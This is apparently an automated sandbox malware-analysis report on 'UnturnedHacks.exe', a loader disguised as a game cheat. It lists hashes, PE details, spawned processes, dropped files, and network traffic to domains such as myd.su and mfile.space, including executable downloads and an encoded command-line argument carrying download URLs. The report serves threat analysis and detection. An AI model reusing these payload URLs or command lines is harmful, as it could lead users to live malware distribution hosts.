analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

UnturnedHacks.exe

Full analysis: https://app.any.run/tasks/109bc6e4-348c-4b43-89e1-94ace1a2f901
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 24, 2019, 22:18:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
adware
trojan
loader
pup
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, PECompact2 compressed
MD5:

1CBD0D0C7AE0D69A5EBEEF1E81062B1C

SHA1:

70D7D2CC244B736D896A9E1F8057526EAA62EB50

SHA256:

DE3DB26B1484C6282A07C2BC2D553A55F57B807FA41BFFFEBC158D9A7BAD353B

SSDEEP:

49152:Tcl+6hQy8YfpY6qDfw7zu/cL2xqO5BiSwdcr7NgGb3E+y:TcY6hwYfp5L7K/LkO5B3wdc7DLty

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • wWUxRYVNi.exe (PID: 332)
      • w52e3e2e5bc44.exe (PID: 1240)
      • w283bb2c636d8.exe (PID: 3716)
      • UnturnedHacks.exe (PID: 2800)
      • UnturnedHacks.exe (PID: 3584)
      • mweshield.exe (PID: 3696)
      • mweshieldup.exe (PID: 3156)
    • Changes the autorun value in the registry

      • w52e3e2e5bc44.exe (PID: 1240)
    • MAILRU was detected

      • w52e3e2e5bc44.exe (PID: 1240)
    • Downloads executable files from the Internet

      • wWUxRYVNi.exe (PID: 332)
    • Changes settings of System certificates

      • w52e3e2e5bc44.exe (PID: 1240)
      • UnturnedHacks.exe (PID: 3584)
    • Connects to CnC server

      • w52e3e2e5bc44.exe (PID: 1240)
    • Registers / Runs the DLL via REGSVR32.EXE

      • w52e3e2e5bc44.exe (PID: 1240)
    • Changes Windows auto-update feature

      • w52e3e2e5bc44.exe (PID: 1240)
    • Loads dropped or rewritten executable

      • mweshield.exe (PID: 3696)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • UnturnedHacks.exe (PID: 3048)
      • wWUxRYVNi.exe (PID: 332)
      • w52e3e2e5bc44.exe (PID: 1240)
      • w283bb2c636d8.exe (PID: 3716)
      • regsvr32.exe (PID: 2604)
    • Reads CPU info

      • wWUxRYVNi.exe (PID: 332)
    • Reads Environment values

      • wWUxRYVNi.exe (PID: 332)
    • Low-level read access rights to disk partition

      • wWUxRYVNi.exe (PID: 332)
    • Creates files in the program directory

      • w52e3e2e5bc44.exe (PID: 1240)
      • w283bb2c636d8.exe (PID: 3716)
    • Adds / modifies Windows certificates

      • w52e3e2e5bc44.exe (PID: 1240)
      • UnturnedHacks.exe (PID: 3584)
    • Reads the cookies of Google Chrome

      • w52e3e2e5bc44.exe (PID: 1240)
    • Reads the cookies of Mozilla Firefox

      • w52e3e2e5bc44.exe (PID: 1240)
    • Creates files in the user directory

      • w52e3e2e5bc44.exe (PID: 1240)
      • UnturnedHacks.exe (PID: 3584)
    • Searches for installed software

      • wWUxRYVNi.exe (PID: 332)
    • Changes the started page of IE

      • w52e3e2e5bc44.exe (PID: 1240)
    • Creates files in the Windows directory

      • w283bb2c636d8.exe (PID: 3716)
      • w52e3e2e5bc44.exe (PID: 1240)
    • Creates a software uninstall entry

      • w283bb2c636d8.exe (PID: 3716)
    • Creates COM task schedule object

      • regsvr32.exe (PID: 2604)
    • Creates files in the driver directory

      • w283bb2c636d8.exe (PID: 3716)
    • Creates or modifies windows services

      • w283bb2c636d8.exe (PID: 3716)
  • INFO

    • Manual execution by user

      • UnturnedHacks.exe (PID: 3584)
      • UnturnedHacks.exe (PID: 2800)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 EXE PECompact compressed (v2.x) (50.1)
.exe | Win32 EXE PECompact compressed (generic) (35.2)
.dll | Win32 Dynamic Link Library (generic) (5.5)
.exe | Win32 Executable (generic) (3.8)
.exe | Win16/32 Executable Delphi generic (1.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2019:04:08 17:55:21+02:00
PEType: PE32
LinkerVersion: 2.25
CodeSize: 888320
InitializedDataSize: 1650688
UninitializedDataSize: -
EntryPoint: 0xda7f4
OSVersion: 5
ImageVersion: -
SubsystemVersion: 5
Subsystem: Windows GUI

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 08-Apr-2019 15:55:21

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0050
Pages in file: 0x0002
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x000F
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x001A
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000100

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 2
Time date stamp: 08-Apr-2019 15:55:21
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_BYTES_REVERSED_HI
  • IMAGE_FILE_BYTES_REVERSED_LO
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LINE_NUMS_STRIPPED
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x00278000
0x0019D600
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
7.99988
.rsrc
0x00279000
0x0000B000
0x0000AE00
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
4.33088

Imports

advapi32.dll
kernel32.dll
netapi32.dll
oleaut32.dll
shell32.dll
user32.dll
version.dll
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
53
Monitored processes
10
Malicious processes
4
Suspicious processes
2

Behavior graph

Click at the process to see the details
drop and start start drop and start drop and start drop and start drop and start unturnedhacks.exe no specs unturnedhacks.exe wwuxryvni.exe #MAILRU w52e3e2e5bc44.exe w283bb2c636d8.exe unturnedhacks.exe no specs unturnedhacks.exe regsvr32.exe mweshield.exe no specs mweshieldup.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3456"C:\Users\admin\AppData\Local\Temp\UnturnedHacks.exe" C:\Users\admin\AppData\Local\Temp\UnturnedHacks.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
3048"C:\Users\admin\AppData\Local\Temp\UnturnedHacks.exe" C:\Users\admin\AppData\Local\Temp\UnturnedHacks.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
332"C:\Users\admin\AppData\Local\Temp\MyDiskPro\wWUxRYVNi.exe" TEw9aHR0cDovL215ZC5zdS9kLypOTj1VbnR1cm5lZEhhY2tzLmV4ZSpGRj0xMjUwMCpBUEk9KlNJWkU9MTExNzY5NipNVT1odHRwOi8vbWZpbGUuc3BhY2UvbC8qU1U9TXlEaXNrLnBybyo=C:\Users\admin\AppData\Local\Temp\MyDiskPro\wWUxRYVNi.exe
UnturnedHacks.exe
User:
admin
Company:
MyDisk.Pro
Integrity Level:
HIGH
Description:
MyDisk.Pro
Version:
1.0.0.0
1240"C:\Users\admin\AppData\Local\Temp\w52e3e2e5bc44.exe" --silent --install_browser_class=0 --pay_browser_class=0 "--rfr=hp.1:834408,dse.1:811570,vbm.1:811580,pult.1:811580,hp.2:834423,dse.2:811610,vbm.2:811620,pult.2:811620,any:811550,any.2:811590" "--install_callback=http://razornow.info/api_v2/callback/?guidC:\Users\admin\AppData\Local\Temp\w52e3e2e5bc44.exe
wWUxRYVNi.exe
User:
admin
Integrity Level:
HIGH
Description:
sputnik
Exit code:
3221225547
Version:
5.1.0.194
3716"C:\Users\admin\AppData\Local\Temp\w283bb2c636d8.exe" mode=s siteid=15106 campaignid=1 sourceid=106C:\Users\admin\AppData\Local\Temp\w283bb2c636d8.exe
wWUxRYVNi.exe
User:
admin
Company:
"My Web Shield"
Integrity Level:
HIGH
Description:
My Web Shield Installation File
Version:
3.0.0.0
2800"C:\Users\admin\Desktop\UnturnedHacks.exe" C:\Users\admin\Desktop\UnturnedHacks.exeexplorer.exe
User:
admin
Company:
VimeWin
Integrity Level:
MEDIUM
Description:
VimeWin
Exit code:
3221226540
Version:
1.0.0.0
3584"C:\Users\admin\Desktop\UnturnedHacks.exe" C:\Users\admin\Desktop\UnturnedHacks.exe
explorer.exe
User:
admin
Company:
VimeWin
Integrity Level:
HIGH
Description:
VimeWin
Version:
1.0.0.0
2604"C:\Windows\System32\regsvr32.exe" /s "C:\Users\admin\AppData\Local\Mail.Ru\Sputnik\ie_addon_dll.dll"C:\Windows\System32\regsvr32.exe
w52e3e2e5bc44.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft(C) Register Server
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3696"C:\Program Files\My Web Shield\mweshield.exe" /ServiceC:\Program Files\My Web Shield\mweshield.exew283bb2c636d8.exe
User:
admin
Company:
"My Web Shield"
Integrity Level:
HIGH
Description:
My Web Shield Sentinel
Exit code:
0
Version:
3.0.0.0
3156"C:\Program Files\My Web Shield\mweshieldup.exe" /ServiceC:\Program Files\My Web Shield\mweshieldup.exew283bb2c636d8.exe
User:
admin
Company:
"My Web Shield"
Integrity Level:
HIGH
Description:
My Web Shield Consolidator
Version:
3.0.0.0
Total events
2 573
Read events
1 660
Write events
0
Delete events
0

Modification events

No data
Executable files
33
Suspicious files
18
Text files
77
Unknown types
8

Dropped files

PID
Process
Filename
Type
1240w52e3e2e5bc44.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cookies.sqlite-shm
MD5:
SHA256:
1240w52e3e2e5bc44.exeC:\Users\admin\AppData\Local\Temp\b693-cce2-78a4-f80d\MailRu.ico
MD5:
SHA256:
1240w52e3e2e5bc44.exeC:\Users\admin\AppData\Local\Temp\45e5-dca1-60d1-e028\GoMailRu.ico
MD5:
SHA256:
332wWUxRYVNi.exeC:\Users\admin\AppData\Local\Temp\TMP48F9.tmp
MD5:
SHA256:
1240w52e3e2e5bc44.exeC:\ProgramData\Mail.Ru\Idtext
MD5:7853DD01A22D556EC4E67A9A601B469F
SHA256:EE0A9CE336AD917BA931D6D0B57573990A6DB4841CC1C1248BD0AD71E3146E66
1240w52e3e2e5bc44.exeC:\Users\admin\AppData\Local\Mail.Ru\Sputnik\GoMailRu.icoimage
MD5:ED62B573B9FF118E3EC726D78C5A099F
SHA256:D8AE22194708322B6CA7C8F5686C85D41EAF847A804657ADEEF6ABCAB74B3270
3048UnturnedHacks.exeC:\Users\admin\AppData\Local\Temp\MyDiskPro\wWUxRYVNi.exeexecutable
MD5:21DDD0E26423B9FA20C27E80362AE065
SHA256:2634CEFA72A4514435DC66FCBE8D0A6B857760E70B8038058B206C6FE0BFB51B
1240w52e3e2e5bc44.exeC:\Users\admin\Favorites\Искать в Интернете.urltext
MD5:EB08378217B4A9D27F46FA00527D778B
SHA256:B0C3586271724BE93C4BA4AF3D9A7DF05462F76B603DD7EF7E5BA4448BB7C244
1240w52e3e2e5bc44.exeC:\Users\admin\AppData\Local\Mail.Ru\Tmp\DeferredTasks\metadatabinary
MD5:C4C6E98DD42CC8853DF86F284FB97D50
SHA256:31DAB4984A707675868084F10BB8A64CA1ED041251164FBB0D9AED9792A3DA3D
1240w52e3e2e5bc44.exeC:\Users\admin\Links\Искать в Интернете.urltext
MD5:B72245103E7C3A59C85440E20317135D
SHA256:75CF82E4581C060A4663B6D249AB3DE840F66E0E97BBABFE5190E86AC1B72AEA
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
41
TCP/UDP connections
54
DNS requests
15
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1240
w52e3e2e5bc44.exe
GET
204
217.69.139.245:80
http://mrds.mail.ru/update/2/version.txt?type=install&bgn=1&standalone=1&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=7&elapsed_time=0&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590
RU
suspicious
1240
w52e3e2e5bc44.exe
GET
217.69.139.245:80
http://mrds.mail.ru/update/2/version.txt?type=setup_unit&id=ie_gomailru&event=done&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=13&elapsed_time=3&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590
RU
suspicious
1240
w52e3e2e5bc44.exe
GET
204
217.69.139.245:80
http://mrds.mail.ru/update/2/version.txt?type=spparams&raw=--silent%20--install_browser_class%3D0%20--pay_browser_class%3D0%20%22--rfr%3Dhp.1%3A834408%2Cdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590%22%20%22--install_callback%3Dhttp%3A%2F%2Frazornow.info%2Fapi_v2%2Fcallback%2F%3Fguid&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=7&elapsed_time=0&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590
RU
suspicious
332
wWUxRYVNi.exe
GET
200
104.24.116.68:80
http://myd.su/files/advertising/f47d0ad31c4c49061b9e505593e3db98.exe
US
executable
623 Kb
malicious
1240
w52e3e2e5bc44.exe
GET
217.69.139.245:80
http://mrds.mail.ru/update/2/version.txt?type=setup_unit&id=fav_gomailru&event=done&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=13&elapsed_time=3&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590
RU
suspicious
1240
w52e3e2e5bc44.exe
GET
204
217.69.139.245:80
http://mrds.mail.ru/update/2/version.txt?type=setup_unit&id=taskbar_mailru&event=done&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=13&elapsed_time=3&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590
RU
suspicious
1240
w52e3e2e5bc44.exe
GET
204
217.69.139.245:80
http://mrds.mail.ru/update/2/version.txt?type=sp_prep&time=15466&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=14&elapsed_time=19&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590
RU
suspicious
1240
w52e3e2e5bc44.exe
GET
217.69.139.245:80
http://mrds.mail.ru/update/2/version.txt?type=spnative_run&id=mrupdater&event=error&error=193&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=14&elapsed_time=15&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590
RU
suspicious
332
wWUxRYVNi.exe
GET
200
104.24.116.68:80
http://myd.su/d/eyJmaWQiOiIyZjA2NmJmMCIsImtleSI6ImVhYmU2MjQ3NmE0NDg5NCJ9
US
executable
1.07 Mb
malicious
332
wWUxRYVNi.exe
POST
104.27.161.171:80
http://mfile.space/l/
US
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1240
w52e3e2e5bc44.exe
217.69.139.122:443
conserv.go.mail.ru
Limited liability company Mail.Ru
RU
unknown
217.69.139.245:80
mrds.mail.ru
Limited liability company Mail.Ru
RU
malicious
1240
w52e3e2e5bc44.exe
217.69.139.247:443
xmlbinupdate.mail.ru
Limited liability company Mail.Ru
RU
malicious
1240
w52e3e2e5bc44.exe
217.69.139.245:80
mrds.mail.ru
Limited liability company Mail.Ru
RU
malicious
332
wWUxRYVNi.exe
104.27.161.171:80
mfile.space
Cloudflare Inc
US
shared
1240
w52e3e2e5bc44.exe
94.100.180.110:443
mailruupdater.cdnmail.ru
Limited liability company Mail.Ru
RU
suspicious
1240
w52e3e2e5bc44.exe
217.69.139.245:443
mrds.mail.ru
Limited liability company Mail.Ru
RU
malicious
332
wWUxRYVNi.exe
104.24.116.68:80
myd.su
Cloudflare Inc
US
shared
1240
w52e3e2e5bc44.exe
217.69.139.110:443
xtnmailru.cdnmail.ru
Limited liability company Mail.Ru
RU
malicious
3716
w283bb2c636d8.exe
88.208.5.120:80
mywebshield-ww1.com
DataWeb Global Group B.V.
NL
malicious

DNS requests

Domain
IP
Reputation
mfile.space
  • 104.27.161.171
  • 104.27.160.171
malicious
myd.su
  • 104.24.116.68
  • 104.24.117.68
malicious
xmlbinupdate.mail.ru
  • 217.69.139.247
shared
conserv.go.mail.ru
  • 217.69.139.122
unknown
mrds.mail.ru
  • 217.69.139.245
suspicious
mailruupdater.cdnmail.ru
  • 94.100.180.110
unknown
xtnmailru.cdnmail.ru
  • 217.69.139.110
unknown
mywebshield-ww1.com
  • 88.208.5.120
malicious
getmywebshield.org
  • 88.208.5.119
unknown
gosoftdl.mail.ru
  • 94.100.180.110
shared

Threats

PID
Process
Class
Message
332
wWUxRYVNi.exe
Misc activity
ADWARE [PTsecurity] Win32.SoftPulse.gikv
Potentially Bad Traffic
ET DNS Query for .su TLD (Soviet Union) Often Malware Related
332
wWUxRYVNi.exe
Potentially Bad Traffic
ET POLICY HTTP Request to .su TLD (Soviet Union) Often Malware Related
332
wWUxRYVNi.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
332
wWUxRYVNi.exe
A Network Trojan was detected
ET TROJAN HTTP Executable Download from suspicious domain with direct request/fake browser (multiple families)
332
wWUxRYVNi.exe
Potentially Bad Traffic
ET POLICY HTTP Request to .su TLD (Soviet Union) Often Malware Related
332
wWUxRYVNi.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
332
wWUxRYVNi.exe
A Network Trojan was detected
ET TROJAN HTTP Executable Download from suspicious domain with direct request/fake browser (multiple families)
332
wWUxRYVNi.exe
Misc activity
ET INFO EXE - Served Attached HTTP
332
wWUxRYVNi.exe
Potentially Bad Traffic
ET POLICY HTTP Request to .su TLD (Soviet Union) Often Malware Related
13 ETPRO signatures available at the full report
No debug info